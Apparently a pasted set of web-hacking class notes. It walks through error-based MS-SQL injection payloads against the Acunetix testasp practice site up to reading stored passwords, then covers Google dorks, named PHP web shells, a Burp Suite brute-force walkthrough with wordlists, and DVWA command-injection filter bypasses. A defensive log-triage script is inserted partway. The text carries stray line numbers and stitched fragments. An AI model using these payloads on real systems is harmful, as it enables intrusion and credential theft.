a guest
Jan 8th, 2018
Error Based Injection
---------------------
Error Based Injection is part of the SQL Injection attack series, in which we try to exploit web applications written in ASP or ASPX, running on IIS with an MS-SQL database.

Problems in Error Based Injection
---------------------------------
1. Unlike PHP, hacking ASP and ASPX sites is a different ball game, because MS-SQL queries are quite different from MySQL queries.
2. database() and version() will not execute on MS-SQL.
3. The ORDER BY clause will not work on MS-SQL.
4. UNION will also not work.
5. It works on a LIFO (Last In, First Out) rule, i.e. you cannot get the entire table list from information_schema.tables at once; you have to get one table at a time.

Why it is known as Error Based Injection
-----------------------------------------
Because you get the data back inside an error message.

Target: vulnweb.com. It is a practice framework from a company called Acunetix.

It has practice targets for both MySQL and MS-SQL attacks.

Step 1: Find any GET parameter in the website's URL, i.e. look for any something=something.
http://testasp.vulnweb.com/showforum.asp?id=0

Step 2: Check the exception handling.
http://testasp.vulnweb.com/showforum.asp?id=0'

Step 3: Check the conditions required for the further attack.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1;

Note: Error Based Injection works on the LIFO rule: Last In, First Out.

For example, if we have a database with tables like the following:
threads -> 1
teacher -> 2
classes -> 3
fee -> 4
users -> 5

Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables));

Step 5: Get the next top table in the list.
testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads','users')));

Target table found: users

Step 6: Get the columns of the users table.
testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in('uname')));

First column found: uname

Step 7: Get the second column.
testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));

Step 8: Get the uname and upass.
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 upass from users));


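The queries in steps 2 to 8 leave a distinctive trail in the web server log. What follows is an added example (not from these notes) of a triage script a defender could run over such a log: it decodes the query string, recognises the convert(int,(select top 1 ...)) shape, and recovers from the NOT IN exclusion lists which table and column names have already been leaked to the client. The four-field log layout and the client IP addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed log extract (fields: cs-method cs-uri-stem cs-uri-query c-ip); not taken from the notes.
SAMPLE_LOG = """\
GET /showforum.asp id=0' 203.0.113.5
GET /showforum.asp id=0+and+1=1; 203.0.113.5
GET /showforum.asp id=0+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)); 203.0.113.5
GET /showforum.asp id=0+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users'))); 203.0.113.5
GET /showforum.asp id=0+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in('uname'))); 203.0.113.5
GET /showforum.asp id=0+and+1=convert(int,(select+top+1+upass+from+users)); 203.0.113.5
GET /showforum.asp id=12 198.51.100.7
"""

# Shape of one error-based read: convert(int,(select top 1 <what> from <source> ...))
READ_RE = re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\s+top\s+1\s+(\w+)\s+from\s+([\w.]+)", re.I)
NOT_IN_RE = re.compile(r"not\s+in\s*\(([^)]*)\)", re.I)      # names the attacker has already read
TABLE_EQ_RE = re.compile(r"table_name\s*=\s*'(\w+)'", re.I)  # table whose columns are being listed
PROBE_RE = re.compile(r"'\s*$|\band\s+1\s*=\s*1\b", re.I)    # step 2/3 style syntax and logic probes


def triage(log_text):
    """Per client IP: probe count, table and column names already leaked (they show up
    in the NOT IN exclusion lists) and direct row reads such as (upass, users)."""
    report = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        q, client = unquote_plus(parts[2]), parts[3]
        probe, read = PROBE_RE.search(q), READ_RE.search(q)
        if not (probe or read):
            continue
        e = report.setdefault(client, {"probes": 0, "tables": set(), "columns": {}, "reads": set()})
        e["probes"] += bool(probe)
        if not read:
            continue
        what, source, rest = read.group(1).lower(), read.group(2).lower(), q[read.end():]
        excl = NOT_IN_RE.search(rest)
        known = {n.strip(" '") for n in excl.group(1).split(",") if n.strip(" '")} if excl else set()
        if source == "information_schema.tables":
            e["tables"] |= known
        elif source == "information_schema.columns":
            tbl = TABLE_EQ_RE.search(rest)
            if tbl:
                e["columns"].setdefault(tbl.group(1).lower(), set()).update(known)
        else:
            e["reads"].add((what, source))  # enumeration done, attacker is pulling row data
    return report
```

Names that appear in a NOT IN list are ones the server has already returned in an error, so the report tells you what is confirmed exposed, not just what was attempted.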
Google Dorks
------------
Google Dorks are techniques for refining searches on Google and other PageRank-based search engines, where we narrow the search results with some non-traditional inputs in the search field.

Three main aspects of any Google result:

Green : URL

Black : Content

Blue  : Header

inurl: This dork concentrates only on the URLs available in Google's index.
For example: inurl:login.asp

site: This dork restricts the search to the content of the site you place after it.
For example: site:lucideus.com

filetype: This dork finds files with a particular extension; these can be documents, PDFs, executables, videos, etc.
For example: site:pokemon filetype:sql

indexof: This dork leads to open directories hosting content on the server that was uploaded by the admin or the users of the website.

For example: indexof: download/books/osho/

Source: https://www.exploit-db.com/google-hacking-database/

Post Parameter Injections:

Post Packet:

Packets that carry sensitive information through the back end of the browser, without showing anything in the URL.
This information is carried in POST_DATA form.


Upload:

CV
Resume
Songs
Video

Payment gateways..

GET:

something=something

============

Tamper Data:

Firefox add-on

This is used to capture packets flowing towards any server as POST_DATA packets. It works at the very end point of the browser, before the data travels towards the server.


Arbitrary File | Hacker's Control Panel

This is a well-coded file made by a hacker in such a way that, once uploaded and executed on a server, it gives you complete access to that server.

This is also called a shell file.
Hackers use this method for defacing websites.

Extreme Access

php : C99.php, b374k.php, kikokaka.php, wsoshell.php
asp

Brute Forcing:

This is a way of finding credentials for some login/authentication by trying permutations and combinations of words.

Burp Suite:

PortSwigger:

Free trial: 14 days

Paid: $349

This is a Java-based tool (.jar); to run it, your system must have Java (the JDK) installed.

Username:
Administrator
Testing
hello
lucideus
security
abc
admin
palvinder
hardik
birthday
chlaak


Password:
123
testing
admin
abc123
hello
nai
btana
password


Brute Forcing DVWA -> Burp Suite
================================

Step 1: Open a fresh link to the page you want to brute force.

Step 2: Browser Settings -> Advanced -> Network -> Settings

Step 3: Manual proxy configuration -> 127.0.0.1, port 8080

Note: Remove all entries from "No Proxy for".

Step 4: Open Burp Suite: Proxy -> Intercept -> Intercept is ON

Step 5: DVWA -> Log in with random details

Step 6: Burp Suite will capture the packet with the random details

Step 7: Select the packet -> right click -> Send to Intruder

Step 8: Intercept is OFF

Step 9: Go to Intruder -> Positions -> Clear

Step 10: Select the value of username -> Add

Step 11: Select the value of password -> Add

Step 12: Attack type: Cluster bomb

Step 13: Payload set 1 (add the values to try for the username)

Step 14: Payload set 2 (add the values to try for the password)

Step 15: Options tab -> Grep - Match -> Clear -> Add -> "Username and/or password incorrect."

Step 16: Start attack

  205. 77. =============================================
  206. 78.  
  207. 79. Command Execution Vulnerability:
  208. 80. -------------------------------
  209. 81.  
  210. 82. If any site is providing u facility of function like ping, tracert, etc,
  211. 83. there we can try for such vulnerability, or any cmd function
  212. 84.  
  213. 85. DVWA: Level - Low
  214. 86.  
  215. 87. union -> merging two queries
  216. 88.  
  217. 89. cmd -> &&
  218. 90.  
  219. 91. ping 172.16.3.2 && ping www.google.com
  220. 92.  
  221. 93.  
  222. 94. Medium:
  223. 95.  
  224. 96. && -> Remove
  225. 97. ; -> Remove
  226. 98.  
  227. 99. ping 172.16.3.2 &;& ping www.google.com
  228. 100.  
  229. 101.  
File Execution Vulnerability
----------------------------

www.bank.com/video.php?include=www.youtube.com/